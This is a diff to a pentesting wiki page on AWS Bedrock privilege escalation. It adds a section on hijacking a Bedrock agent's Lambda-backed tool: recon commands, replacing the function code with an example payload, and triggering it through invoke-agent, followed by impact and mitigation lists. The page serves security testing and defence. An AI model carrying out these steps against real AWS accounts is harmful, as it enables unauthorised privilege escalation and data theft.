diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md index 017d1323b..213c01edd 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md @@ -29,7 +29,7 @@ List interpreters (control-plane) and inspect their configuration: ```bash aws bedrock-agentcore-control list-code-interpreters aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id -```` +``` > The create-code-interpreter command supports `--execution-role-arn` which defines what AWS permissions the interpreter will have. @@ -108,6 +108,84 @@ awscurl -X POST \ * Use **SCPs** to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary). * Enable appropriate **CloudTrail data events** for AgentCore where applicable; alert on unexpected invocations and session creation. +## Amazon Bedrock Agents + +### `lambda:UpdateFunctionCode`, `bedrock:InvokeAgent` - Agent Tool Hijacking via Lambda + +Bedrock Agents can use **Lambda-backed action groups** as tools (external execution). If a principal can **modify the code of a Lambda function used by an agent**, and can then **invoke the agent**, they can execute attacker-controlled code under the **Lambda execution role**. + +> [!NOTE] +> This is a **cross-service trust abuse** (Bedrock → Lambda), not a vulnerability. The attacker may not be able to invoke the Lambda directly, but can still trigger it via the agent. + +#### Preconditions (common misconfiguration) + +- A Bedrock Agent exists with an **action group backed by a Lambda function** +- The attacker has: + - `lambda:UpdateFunctionCode` + - `bedrock:InvokeAgent` +- The Lambda execution role has broader permissions than the attacker +- The attacker can identify the Lambda used by the agent + +#### Recon + +Enumerate agent action groups: + +```bash +aws bedrock-agent list-agents +aws bedrock-agent get-agent --agent-id +aws bedrock-agent list-agent-action-groups --agent-id +``` + +Inspect Lambda: + +```bash +aws lambda get-function --function-name +``` + +#### Exploitation + +Replace Lambda code: + +```bash +zip payload.zip lambda_function.py + +aws lambda update-function-code \ + --function-name \ + --zip-file fileb://payload.zip +``` + +Example payload: + +```python +import boto3 + +def lambda_handler(event, context): + return boto3.client("sts").get_caller_identity() +``` + +Trigger via agent: + +```bash +aws bedrock-agent-runtime invoke-agent \ + --agent-id \ + --agent-alias-id \ + --session-id test \ + --input-text "trigger tool" +``` + +#### Impact + +* **Privilege escalation** into Lambda execution role +* **Data exfiltration** from AWS services +* **Cross-service abuse** via trusted agent execution + +#### Mitigations + +* **Restrict** `lambda:UpdateFunctionCode` +* Use **least-privilege** Lambda roles +* **Monitor** Lambda code changes +* **Audit** Bedrock agent tool usage + ## References - [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/) @@ -116,6 +194,7 @@ awscurl -X POST \ - [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html) - [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html) - [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html) +- [SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors) {{#include ../../../../banners/hacktricks-training.md}}